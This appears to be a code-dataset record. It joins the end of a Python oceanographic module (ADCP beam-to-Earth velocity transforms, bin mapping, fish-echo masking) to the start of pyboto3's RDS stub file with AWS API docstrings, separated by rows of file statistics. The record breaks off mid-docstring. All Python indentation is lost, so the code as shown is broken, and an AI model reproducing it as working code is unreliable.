nz, nt = b1.shape # Number of vertical bins and records in the time series.
d2r = np.pi/180
head = head*d2r
ptch = ptch*d2r
roll = roll*d2r
theta = theta*d2r
# Time-dependent angles (heading, pitch and roll).
Sph1 = np.sin(head)
Sph2 = np.sin(ptch)
Sph3 = np.sin(roll)
Cph1 = np.cos(head)
Cph2 = np.cos(ptch)
Cph3 = np.cos(roll)
if gimbaled: # Correct heading (D&S 2007, eq. A2).
if verbose:
print('Gimbaled instrument case.')
Sph2Sph3 = Sph2*Sph3
head = head + np.arcsin( Sph2Sph3/np.sqrt(Cph2**2 + Sph2Sph3**2) )
Sph1 = np.sin(head)
Cph1 = np.cos(head)
else: # Correct pitch (D&S 2007, eq. A1 Lohrmann et al. 1990, eq. A1).
if verbose:
print('Fixed instrument case.')
ptch = np.arcsin( (Sph2*Cph3)/np.sqrt(1 - (Sph2*Sph3)**2) )
Sph2 = np.sin(ptch)
Cph2 = np.cos(ptch)
# Convert instrument-referenced velocities
# to Earth-referenced velocities.
# Option 1: Classic four-beam solution.
# Option 2: five-beam solution for [u, v, w].
cx1 = Cph1*Cph3 + Sph1*Sph2*Sph3
cx2 = Sph1*Cph3 - Cph1*Sph2*Sph3
cx3 = Cph2*Sph3
cy1 = Sph1*Cph2
cy2 = Cph1*Cph2
cy3 = Sph2
cz1 = Cph1*Sph3 - Sph1*Sph2*Cph3
cz2 = Sph1*Sph3 + Cph1*Sph2*Cph3
cz3 = Cph2*Cph3
# Convert beam-referenced velocities to instrument-referenced velocities.
# NOTE: The convention used here (positive x axis = horizontally away from beam 1) and
# positive y axis = horizontally away from beam 3) is not
# the same as the one used by the instrument's firmware if
# the coordinate transformation mode is set to "instrument
# coordinates" before deployment.
Vx, Vy, Vz, Vz5 = janus2xyz5(b1, b2, b3, b4, b5, theta, r=r, ptch=ptch, roll=roll, binmaptype=binmaptype, use3beamsol=use3beamsol, verbose=verbose)
w5 = Vz5*cz3 # w from beam 5 only.
if uvwbeam5:
if verbose:
print('Using vertical beam for [u, v, w].')
u = +Vx*cx1 + Vy*cy1 + Vz5*cz1
v = -Vx*cx2 + Vy*cy2 - Vz5*cz2
w = -Vx*cx3 + Vy*cy3 + w5
else:
if verbose:
print('Using only beams 1-4 for [u, v, w].')
u = +Vx*cx1 + Vy*cy1 + Vz*cz1
v = -Vx*cx2 + Vy*cy2 - Vz*cz2
w = -Vx*cx3 + Vy*cy3 + Vz*cz3
return u, v, w, w5
def binmap(b1, b2, b3, b4, r, theta, ptch, roll, how='linear'):
"""
USAGE
-----
b1m, b2m, b3m, b4m = binmap(b1, b2, b3, b4, r, theta, ptch, roll, how='linear')
theta, ptch and roll must be in RADIANS.
Interpolate beam-coordinate velocities to fixed horizontal planes based on tilt angles
(pitch and roll).
"""
Sth = np.sin(theta)
Cth = np.cos(theta)
Sph2 = np.sin(ptch)
Cph2 = np.cos(ptch)
Sph3 = np.sin(roll)
Cph3 = np.cos(roll)
Z = r*Cth
z00 = np.matrix([0, 0, -1]).T
nz, nt = b1.shape
# b1 b2 b3 b4
E = np.matrix([[-Sth, +Sth, 0, 0],
[ 0, 0, -Sth, +Sth],
[-Cth, -Cth, -Cth, -Cth]])
Bo = np.dstack((b1[..., np.newaxis], b2[..., np.newaxis], b3[..., np.newaxis], b4[..., np.newaxis]))
for i in range(4):
Ei = E[:,i]
Boi = Bo[:,:,i] # z, t, bi.
bmi = Boi.copy()
for k in range(nt):
PR = np.array([[Cph3[k], 0, Sph3[k]],
[Sph2[k]*Sph3[k], Cph2[k], -Sph2[k]*Cph3[k]],
[-Sph3[k]*Cph2[k], Sph2[k], Cph2[k]*Cph3[k]]])
zi = np.array((PR*Ei).T*z00*r).squeeze() # Actual bin height, dot product of tilt matrix with along-beam distance vector.
bmi[:,k] = interp1d(zi, Boi[:,k], kind=how, fill_value="extrapolate", assume_sorted=True)(Z)
Bo[:,:,i] = bmi
return Bo[:,:,0], Bo[:,:,1], Bo[:,:,2], Bo[:,:,3]
def binmap5(b1, b2, b3, b4, b5, r, theta, ptch, roll, how='linear'):
"""
USAGE
-----
b1m, b2m, b3m, b4m, b5m = binmap5(b1, b2, b3, b4, b5, r, theta, ptch, roll, how='linear')
theta, ptch and roll must be in RADIANS.
Interpolate beam-coordinate velocities to fixed horizontal planes based on tilt angles
(pitch and roll).
"""
Sth = np.sin(theta)
Cth = np.cos(theta)
Sph2 = np.sin(ptch)
Cph2 = np.cos(ptch)
Sph3 = np.sin(roll)
Cph3 = np.cos(roll)
Z = r*Cth
z00 = np.matrix([0, 0, -1]).T
nz, nt = b1.shape
# b1 b2 b3 b4 b5
E = np.matrix([[-Sth, +Sth, 0, 0, 0],
[ 0, 0, -Sth, +Sth, 0],
[-Cth, -Cth, -Cth, -Cth, -1]])
Bo = np.dstack((b1[..., np.newaxis], b2[..., np.newaxis], b3[..., np.newaxis], b4[..., np.newaxis], b5[..., np.newaxis]))
for i in range(5):
Ei = E[:,i]
Boi = Bo[:,:,i] # z, t, bi.
bmi = Boi.copy()
for k in range(nt):
PR = np.array([[Cph3[k], 0, Sph3[k]],
[Sph2[k]*Sph3[k], Cph2[k], -Sph2[k]*Cph3[k]],
[-Sph3[k]*Cph2[k], Sph2[k], Cph2[k]*Cph3[k]]])
zi = np.array((PR*Ei).T*z00*r).squeeze() # Actual bin height, dot product of tilt matrix with along-beam distance vector.
bmi[:,k] = interp1d(zi, Boi[:,k], kind=how, fill_value="extrapolate", assume_sorted=True)(Z)
Bo[:,:,i] = bmi
return Bo[:,:,0], Bo[:,:,1], Bo[:,:,2], Bo[:,:,3], Bo[:,:,4]
def janus3beamsol(b1, b2, b3, b4):
"""
Usage
-----
b1, b2, b3, b4 = janus3beamsol(b1, b2, b3, b4)
Calculates a three-beam solution for a bad beam when the other three Janus beams have good data.
"""
Nz, Nt = b1.shape
for nt in range(Nt):
for nz in range(Nz): # Set error velocity to zero: const*(b1 + b2 -b3 -b4) = 0.
bki = np.array([b1[nz,nt], b2[nz,nt], b3[nz,nt], b4[nz,nt]])
fbad = np.isnan(bki) # b1 + b2 = b3 + b4 Solve for bad beam.
if fbad.sum()==1: # Only one bad beam allowed for 3-beam solutions.
fbad = np.where(fbad)[0][0]
if fbad==0: # Beam 1 is bad.
b1[nz,nt] = bki[2] + bki[3] - bki[1]
elif fbad==1: # Beam 2 is bad.
b2[nz,nt] = bki[2] + bki[3] - bki[0]
elif fbad==2: # Beam 3 is bad.
b3[nz,nt] = bki[0] + bki[1] - bki[3]
elif fbad==3: # Beam 4 is bad.
b4[nz,nt] = bki[0] + bki[1] - bki[2]
return b1, b2, b3, b4
def mskfish(b1, b2, b3, b4, amp1, amp2, amp3, amp4, threshold=50):
"""
USAGE
-----
b1, b2, b3, b4 = mskfish(b1, b2, b3, b4, amp1, amp2, amp3, amp4, threshold=50)
REFERENCE
---------
ADCP Coordinate transformation: Formulas and calculations (2010), p 22-23
P/N 951-6079-00 (January 2010), Teledyne RD Instruments
Available at:
http://www.teledynemarine.com/Documents/Brand%20Support/RD%20INSTRUMENTS/
Technical%20Resources/Manuals%20and%20Guides/General%20Interest/Coordinate_Transformation.pdf
"""
nz, nt = b1.shape
nzm = nz - 1
bb1, bb2, bb3, bb4 = b1.copy(), b2.copy(), b3.copy(), b4.copy()
for i in range(nt):
Bi = np.hstack((b1[:, i][:, np.newaxis], b2[:, i][:, np.newaxis], b3[:, i][:, np.newaxis], b4[:, i][:, np.newaxis]))
for k in range(nz):
ampk = [amp1[k, i], amp2[k, i], amp3[k, i], amp4[k, i]]
ampmax = np.max(ampk)
fm = np.argsort(ampk)[:2] # Weakest and second-weakest echo.
ampmin1, ampmin2 = ampk[fm[0]], ampk[fm[1]]
damp1 = ampmax - ampmin1
damp2 = ampmax - ampmin2
if damp1>threshold: # Fish in at least 1 beam.
Bi[k, fm[0]] = np.nan # Mark k-th cell as bad.
if k<nzm: # Also mark cells k+1 as bad, because
Bi[k+1, fm[0]] = np.nan # echo is measured at the end of the cells.
if damp2>threshold: # Fish in at least 2 beams.
Bi[k, :] = np.nan # Mark all beams as bad.
if k<nzm:
Bi[k+1, :] = np.nan
else: # No fish detected on any beam at cell k.
pass
bb1[:, i] = Bi[:, 0]
bb2[:, i] = Bi[:, 1]
bb3[:, i] = Bi[:, 2]
bb4[:, i] = Bi[:, 3]
return bb1, bb2, bb3, bb4
def getmskfish(amp1, amp2, amp3, amp4, threshold=50):
"""
USAGE
-----
msk1, msk2, msk3, msk4 = getmskfish(amp1, amp2, amp3, amp4, threshold=50)
REFERENCE
---------
ADCP Coordinate transformation: Formulas and calculations (2010), p 22-23
P/N 951-6079-00 (January 2010), Teledyne RD Instruments
Available at:
http://www.teledynemarine.com/Documents/Brand%20Support/RD%20INSTRUMENTS/
Technical%20Resources/Manuals%20and%20Guides/General%20Interest/Coordinate_Transformation.pdf
"""
nz, nt = amp1.shape
nzm = nz - 1
msk1 = np.ones((nz, nt))
msk2 = msk1.copy()
msk3 = msk1.copy()
msk4 = msk1.copy()
for i in range(nt):
Bi = np.ones((nz, 4))
for k in range(nz):
ampk = [amp1[k, i], amp2[k, i], amp3[k, i], amp4[k, i]]
ampmax = np.max(ampk)
fm = np.argsort(ampk)[:2] # Weakest and second-weakest echo.
ampmin1, ampmin2 = ampk[fm[0]], ampk[fm[1]]
damp1 = ampmax - ampmin1
damp2 = ampmax - ampmin2
if damp1>threshold: # Fish in at least 1 beam.
Bi[k, fm[0]] = np.nan # Mark k-th cell as bad.
if k<nzm: # Also mark cells k+1 as bad, because
Bi[k+1, fm[0]] = np.nan # echo is measured at the end of the cells.
if damp2>threshold: # Fish in at least 2 beams.
Bi[k, :] = np.nan # Mark all beams as bad.
if k<nzm:
Bi[k+1, :] = np.nan
else: # No fish detected on any beam at cell k.
pass
msk1[:, i] = Bi[:, 0]
msk2[:, i] = Bi[:, 1]
msk3[:, i] = Bi[:, 2]
msk4[:, i] = Bi[:, 3]
return msk1, msk2, msk3, msk4
| 37.878462
| 163
| 0.520775
| 3,302
| 24,621
| 3.881284
| 0.123259
| 0.014045
| 0.019195
| 0.025593
| 0.895053
| 0.88647
| 0.875858
| 0.866417
| 0.859785
| 0.847222
| 0
| 0.05863
| 0.333577
| 24,621
| 649
| 164
| 37.936826
| 0.722452
| 0.497421
| 0
| 0.704861
| 0
| 0
| 0.058129
| 0
| 0
| 0
| 0
| 0
| 0.020833
| 1
| 0.03125
| false
| 0.006944
| 0.010417
| 0
| 0.072917
| 0.041667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d8356547bfcdc1160b7b20fdba7f9bc82e6b549d
| 434,487
|
py
|
Python
|
pyboto3/rds.py
|
thecraftman/pyboto3
|
653a0db2b00b06708334431da8f169d1f7c7734f
|
[
"MIT"
] | null | null | null |
pyboto3/rds.py
|
thecraftman/pyboto3
|
653a0db2b00b06708334431da8f169d1f7c7734f
|
[
"MIT"
] | null | null | null |
pyboto3/rds.py
|
thecraftman/pyboto3
|
653a0db2b00b06708334431da8f169d1f7c7734f
|
[
"MIT"
] | null | null | null |
'''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def add_role_to_db_cluster(DBClusterIdentifier=None, RoleArn=None):
"""
Associates an Identity and Access Management (IAM) role from an Aurora DB cluster. For more information, see Authorizing Amazon Aurora to Access Other AWS Services On Your Behalf .
See also: AWS API Documentation
:example: response = client.add_role_to_db_cluster(
DBClusterIdentifier='string',
RoleArn='string'
)
:type DBClusterIdentifier: string
:param DBClusterIdentifier: [REQUIRED]
The name of the DB cluster to associate the IAM role with.
:type RoleArn: string
:param RoleArn: [REQUIRED]
The Amazon Resource Name (ARN) of the IAM role to associate with the Aurora DB cluster, for example arn:aws:iam::123456789012:role/AuroraAccessRole .
"""
pass
def add_source_identifier_to_subscription(SubscriptionName=None, SourceIdentifier=None):
"""
Adds a source identifier to an existing RDS event notification subscription.
See also: AWS API Documentation
Examples
This example add a source identifier to an event notification subscription.
Expected Output:
:example: response = client.add_source_identifier_to_subscription(
SubscriptionName='string',
SourceIdentifier='string'
)
:type SubscriptionName: string
:param SubscriptionName: [REQUIRED]
The name of the RDS event notification subscription you want to add a source identifier to.
:type SourceIdentifier: string
:param SourceIdentifier: [REQUIRED]
The identifier of the event source to be added. An identifier must begin with a letter and must contain only ASCII letters, digits, and hyphens; it cannot end with a hyphen or contain two consecutive hyphens.
Constraints:
If the source type is a DB instance, then a DBInstanceIdentifier must be supplied.
If the source type is a DB security group, a DBSecurityGroupName must be supplied.
If the source type is a DB parameter group, a DBParameterGroupName must be supplied.
If the source type is a DB snapshot, a DBSnapshotIdentifier must be supplied.
:rtype: dict
:return: {
'EventSubscription': {
'CustomerAwsId': 'string',
'CustSubscriptionId': 'string',
'SnsTopicArn': 'string',
'Status': 'string',
'SubscriptionCreationTime': 'string',
'SourceType': 'string',
'SourceIdsList': [
'string',
],
'EventCategoriesList': [
'string',
],
'Enabled': True|False,
'EventSubscriptionArn': 'string'
}
}
:returns:
(string) --
"""
pass
def add_tags_to_resource(ResourceName=None, Tags=None):
"""
Adds metadata tags to an Amazon RDS resource. These tags can also be used with cost allocation reporting to track cost associated with Amazon RDS resources, or used in a Condition statement in an IAM policy for Amazon RDS.
For an overview on tagging Amazon RDS resources, see Tagging Amazon RDS Resources .
See also: AWS API Documentation
Examples
This example adds a tag to an option group.
Expected Output:
:example: response = client.add_tags_to_resource(
ResourceName='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type ResourceName: string
:param ResourceName: [REQUIRED]
The Amazon RDS resource the tags will be added to. This value is an Amazon Resource Name (ARN). For information about creating an ARN, see Constructing an RDS Amazon Resource Name (ARN) .
:type Tags: list
:param Tags: [REQUIRED]
The tags to be assigned to the Amazon RDS resource.
(dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
:return: response = client.add_tags_to_resource(
ResourceName='arn:aws:rds:us-east-1:992648334831:og:mymysqloptiongroup',
Tags=[
{
'Key': 'Staging',
'Value': 'LocationDB',
},
],
)
print(response)
"""
pass
def apply_pending_maintenance_action(ResourceIdentifier=None, ApplyAction=None, OptInType=None):
"""
Applies a pending maintenance action to a resource (for example, to a DB instance).
See also: AWS API Documentation
Examples
This example immediately applies a pending system update to a DB instance.
Expected Output:
:example: response = client.apply_pending_maintenance_action(
ResourceIdentifier='string',
ApplyAction='string',
OptInType='string'
)
:type ResourceIdentifier: string
:param ResourceIdentifier: [REQUIRED]
The RDS Amazon Resource Name (ARN) of the resource that the pending maintenance action applies to. For information about creating an ARN, see Constructing an RDS Amazon Resource Name (ARN) .
:type ApplyAction: string
:param ApplyAction: [REQUIRED]
The pending maintenance action to apply to this resource.
Valid values: system-update , db-upgrade
:type OptInType: string
:param OptInType: [REQUIRED]
A value that specifies the type of opt-in request, or undoes an opt-in request. An opt-in request of type immediate cannot be undone.
Valid values:
immediate - Apply the maintenance action immediately.
next-maintenance - Apply the maintenance action during the next maintenance window for the resource.
undo-opt-in - Cancel any existing next-maintenance opt-in requests.
:rtype: dict
:return: {
'ResourcePendingMaintenanceActions': {
'ResourceIdentifier': 'string',
'PendingMaintenanceActionDetails': [
{
'Action': 'string',
'AutoAppliedAfterDate': datetime(2015, 1, 1),
'ForcedApplyDate': datetime(2015, 1, 1),
'OptInStatus': 'string',
'CurrentApplyDate': datetime(2015, 1, 1),
'Description': 'string'
},
]
}
}
"""
pass
def authorize_db_security_group_ingress(DBSecurityGroupName=None, CIDRIP=None, EC2SecurityGroupName=None, EC2SecurityGroupId=None, EC2SecurityGroupOwnerId=None):
"""
Enables ingress to a DBSecurityGroup using one of two forms of authorization. First, EC2 or VPC security groups can be added to the DBSecurityGroup if the application using the database is running on EC2 or VPC instances. Second, IP ranges are available if the application accessing your database is running on the Internet. Required parameters for this API are one of CIDR range, EC2SecurityGroupId for VPC, or (EC2SecurityGroupOwnerId and either EC2SecurityGroupName or EC2SecurityGroupId for non-VPC).
For an overview of CIDR ranges, go to the Wikipedia Tutorial .
See also: AWS API Documentation
Examples
This example authorizes access to the specified security group by the specified CIDR block.
Expected Output:
:example: response = client.authorize_db_security_group_ingress(
DBSecurityGroupName='string',
CIDRIP='string',
EC2SecurityGroupName='string',
EC2SecurityGroupId='string',
EC2SecurityGroupOwnerId='string'
)
:type DBSecurityGroupName: string
:param DBSecurityGroupName: [REQUIRED]
The name of the DB security group to add authorization to.
:type CIDRIP: string
:param CIDRIP: The IP range to authorize.
:type EC2SecurityGroupName: string
:param EC2SecurityGroupName: Name of the EC2 security group to authorize. For VPC DB security groups, EC2SecurityGroupId must be provided. Otherwise, EC2SecurityGroupOwnerId and either EC2SecurityGroupName or EC2SecurityGroupId must be provided.
:type EC2SecurityGroupId: string
:param EC2SecurityGroupId: Id of the EC2 security group to authorize. For VPC DB security groups, EC2SecurityGroupId must be provided. Otherwise, EC2SecurityGroupOwnerId and either EC2SecurityGroupName or EC2SecurityGroupId must be provided.
:type EC2SecurityGroupOwnerId: string
:param EC2SecurityGroupOwnerId: AWS account number of the owner of the EC2 security group specified in the EC2SecurityGroupName parameter. The AWS Access Key ID is not an acceptable value. For VPC DB security groups, EC2SecurityGroupId must be provided. Otherwise, EC2SecurityGroupOwnerId and either EC2SecurityGroupName or EC2SecurityGroupId must be provided.
:rtype: dict
:return: {
'DBSecurityGroup': {
'OwnerId': 'string',
'DBSecurityGroupName': 'string',
'DBSecurityGroupDescription': 'string',
'VpcId': 'string',
'EC2SecurityGroups': [
{
'Status': 'string',
'EC2SecurityGroupName': 'string',
'EC2SecurityGroupId': 'string',
'EC2SecurityGroupOwnerId': 'string'
},
],
'IPRanges': [
{
'Status': 'string',
'CIDRIP': 'string'
},
],
'DBSecurityGroupArn': 'string'
}
}
:returns:
DescribeDBSecurityGroups
AuthorizeDBSecurityGroupIngress
CreateDBSecurityGroup
RevokeDBSecurityGroupIngress
"""
pass
def can_paginate(operation_name=None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is create_foo, and you'd normally invoke the
operation as client.create_foo(**kwargs), if the
create_foo operation can be paginated, you can use the
call client.get_paginator('create_foo').
"""
pass
def copy_db_cluster_parameter_group(SourceDBClusterParameterGroupIdentifier=None, TargetDBClusterParameterGroupIdentifier=None, TargetDBClusterParameterGroupDescription=None, Tags=None):
"""
Copies the specified DB cluster parameter group.
See also: AWS API Documentation
Examples
This example copies a DB cluster parameter group.
Expected Output:
:example: response = client.copy_db_cluster_parameter_group(
SourceDBClusterParameterGroupIdentifier='string',
TargetDBClusterParameterGroupIdentifier='string',
TargetDBClusterParameterGroupDescription='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type SourceDBClusterParameterGroupIdentifier: string
:param SourceDBClusterParameterGroupIdentifier: [REQUIRED]
The identifier or Amazon Resource Name (ARN) for the source DB cluster parameter group. For information about creating an ARN, see Constructing an RDS Amazon Resource Name (ARN) .
Constraints:
Must specify a valid DB cluster parameter group.
If the source DB cluster parameter group is in the same region as the copy, specify a valid DB parameter group identifier, for example my-db-cluster-param-group , or a valid ARN.
If the source DB parameter group is in a different region than the copy, specify a valid DB cluster parameter group ARN, for example arn:aws:rds:us-east-1:123456789012:cluster-pg:custom-cluster-group1 .
:type TargetDBClusterParameterGroupIdentifier: string
:param TargetDBClusterParameterGroupIdentifier: [REQUIRED]
The identifier for the copied DB cluster parameter group.
Constraints:
Cannot be null, empty, or blank
Must contain from 1 to 255 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
Example: my-cluster-param-group1
:type TargetDBClusterParameterGroupDescription: string
:param TargetDBClusterParameterGroupDescription: [REQUIRED]
A description for the copied DB cluster parameter group.
:type Tags: list
:param Tags: A list of tags.
(dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
:rtype: dict
:return: {
'DBClusterParameterGroup': {
'DBClusterParameterGroupName': 'string',
'DBParameterGroupFamily': 'string',
'Description': 'string',
'DBClusterParameterGroupArn': 'string'
}
}
"""
pass
def copy_db_cluster_snapshot(SourceDBClusterSnapshotIdentifier=None, TargetDBClusterSnapshotIdentifier=None, KmsKeyId=None, PreSignedUrl=None, CopyTags=None, Tags=None, SourceRegion=None):
"""
Copies a snapshot of a DB cluster.
To copy a DB cluster snapshot from a shared manual DB cluster snapshot, SourceDBClusterSnapshotIdentifier must be the Amazon Resource Name (ARN) of the shared DB cluster snapshot.
You can copy an encrypted DB cluster snapshot from another AWS region. In that case, the region where you call the CopyDBClusterSnapshot action is the destination region for the encrypted DB cluster snapshot to be copied to. To copy an encrypted DB cluster snapshot from another region, you must provide the following values:
To learn how to generate a Signature Version 4 signed request, see Authenticating Requests: Using Query Parameters (AWS Signature Version 4) and Signature Version 4 Signing Process .
To cancel the copy operation once it is in progress, delete the target DB cluster snapshot identified by TargetDBClusterSnapshotIdentifier while that DB cluster snapshot is in "copying" status.
For more information on copying encrypted DB cluster snapshots from one region to another, see Copying a DB Cluster Snapshot in the Same Account, Either in the Same Region or Across Regions in the Amazon RDS User Guide.
For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
See also: AWS API Documentation
Examples
The following example copies an automated snapshot of a DB cluster to a new DB cluster snapshot.
Expected Output:
:example: response = client.copy_db_cluster_snapshot(
SourceDBClusterSnapshotIdentifier='string',
TargetDBClusterSnapshotIdentifier='string',
KmsKeyId='string',
CopyTags=True|False,
Tags=[
{
'Key': 'string',
'Value': 'string'
},
],
SourceRegion='string'
)
:type SourceDBClusterSnapshotIdentifier: string
:param SourceDBClusterSnapshotIdentifier: [REQUIRED]
The identifier of the DB cluster snapshot to copy. This parameter is not case-sensitive.
You cannot copy an encrypted, shared DB cluster snapshot from one AWS region to another.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens.
First character must be a letter.
Cannot end with a hyphen or contain two consecutive hyphens.
Must specify a valid system snapshot in the 'available' state.
If the source snapshot is in the same region as the copy, specify a valid DB snapshot identifier.
If the source snapshot is in a different region than the copy, specify a valid DB cluster snapshot ARN. For more information, go to Copying a DB Snapshot or DB Cluster Snapshot .
Example: my-cluster-snapshot1
:type TargetDBClusterSnapshotIdentifier: string
:param TargetDBClusterSnapshotIdentifier: [REQUIRED]
The identifier of the new DB cluster snapshot to create from the source DB cluster snapshot. This parameter is not case-sensitive.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens.
First character must be a letter.
Cannot end with a hyphen or contain two consecutive hyphens.
Example: my-cluster-snapshot2
:type KmsKeyId: string
:param KmsKeyId: The AWS KMS key ID for an encrypted DB cluster snapshot. The KMS key ID is the Amazon Resource Name (ARN), KMS key identifier, or the KMS key alias for the KMS encryption key.
If you copy an unencrypted DB cluster snapshot and specify a value for the KmsKeyId parameter, Amazon RDS encrypts the target DB cluster snapshot using the specified KMS encryption key.
If you copy an encrypted DB cluster snapshot from your AWS account, you can specify a value for KmsKeyId to encrypt the copy with a new KMS encryption key. If you don't specify a value for KmsKeyId , then the copy of the DB cluster snapshot is encrypted with the same KMS key as the source DB cluster snapshot.
If you copy an encrypted DB cluster snapshot that is shared from another AWS account, then you must specify a value for KmsKeyId .
To copy an encrypted DB cluster snapshot to another region, you must set KmsKeyId to the KMS key ID you want to use to encrypt the copy of the DB cluster snapshot in the destination region. KMS encryption keys are specific to the region that they are created in, and you cannot use encryption keys from one region in another region.
:type PreSignedUrl: string
:param PreSignedUrl: The URL that contains a Signature Version 4 signed request for the CopyDBClusterSnapshot API action in the AWS region that contains the source DB cluster snapshot to copy. The PreSignedUrl parameter must be used when copying an encrypted DB cluster snapshot from another AWS region.
The pre-signed URL must be a valid request for the CopyDBSClusterSnapshot API action that can be executed in the source region that contains the encrypted DB cluster snapshot to be copied. The pre-signed URL request must contain the following parameter values:
KmsKeyId - The KMS key identifier for the key to use to encrypt the copy of the DB cluster snapshot in the destination region. This is the same identifier for both the CopyDBClusterSnapshot action that is called in the destination region, and the action contained in the pre-signed URL.
DestinationRegion - The name of the region that the DB cluster snapshot will be created in.
SourceDBClusterSnapshotIdentifier - The DB cluster snapshot identifier for the encrypted DB cluster snapshot to be copied. This identifier must be in the Amazon Resource Name (ARN) format for the source region. For example, if you are copying an encrypted DB cluster snapshot from the us-west-2 region, then your SourceDBClusterSnapshotIdentifier looks like the following example: arn:aws:rds:us-west-2:123456789012:cluster-snapshot:aurora-cluster1-snapshot-20161115 .
To learn how to generate a Signature Version 4 signed request, see Authenticating Requests: Using Query Parameters (AWS Signature Version 4) and Signature Version 4 Signing Process .
Please note that this parameter is automatically populated if it is not provided. Including this parameter is not required
:type CopyTags: boolean
:param CopyTags: True to copy all tags from the source DB cluster snapshot to the target DB cluster snapshot; otherwise false. The default is false.
:type Tags: list
:param Tags: A list of tags.
(dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
:type SourceRegion: string
:param SourceRegion: The ID of the region that contains the snapshot to be copied.
:rtype: dict
:return: {
'DBClusterSnapshot': {
'AvailabilityZones': [
'string',
],
'DBClusterSnapshotIdentifier': 'string',
'DBClusterIdentifier': 'string',
'SnapshotCreateTime': datetime(2015, 1, 1),
'Engine': 'string',
'AllocatedStorage': 123,
'Status': 'string',
'Port': 123,
'VpcId': 'string',
'ClusterCreateTime': datetime(2015, 1, 1),
'MasterUsername': 'string',
'EngineVersion': 'string',
'LicenseModel': 'string',
'SnapshotType': 'string',
'PercentProgress': 123,
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DBClusterSnapshotArn': 'string',
'SourceDBClusterSnapshotArn': 'string',
'IAMDatabaseAuthenticationEnabled': True|False
}
}
:returns:
TargetDBClusterSnapshotIdentifier - The identifier for the new copy of the DB cluster snapshot in the destination region.
SourceDBClusterSnapshotIdentifier - The DB cluster snapshot identifier for the encrypted DB cluster snapshot to be copied. This identifier must be in the ARN format for the source region and is the same value as the SourceDBClusterSnapshotIdentifier in the pre-signed URL.
"""
pass
def copy_db_parameter_group(SourceDBParameterGroupIdentifier=None, TargetDBParameterGroupIdentifier=None, TargetDBParameterGroupDescription=None, Tags=None):
"""
Copies the specified DB parameter group.
See also: AWS API Documentation
Examples
This example copies a DB parameter group.
Expected Output:
:example: response = client.copy_db_parameter_group(
SourceDBParameterGroupIdentifier='string',
TargetDBParameterGroupIdentifier='string',
TargetDBParameterGroupDescription='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type SourceDBParameterGroupIdentifier: string
:param SourceDBParameterGroupIdentifier: [REQUIRED]
The identifier or ARN for the source DB parameter group. For information about creating an ARN, see Constructing an RDS Amazon Resource Name (ARN) .
Constraints:
Must specify a valid DB parameter group.
Must specify a valid DB parameter group identifier, for example my-db-param-group , or a valid ARN.
:type TargetDBParameterGroupIdentifier: string
:param TargetDBParameterGroupIdentifier: [REQUIRED]
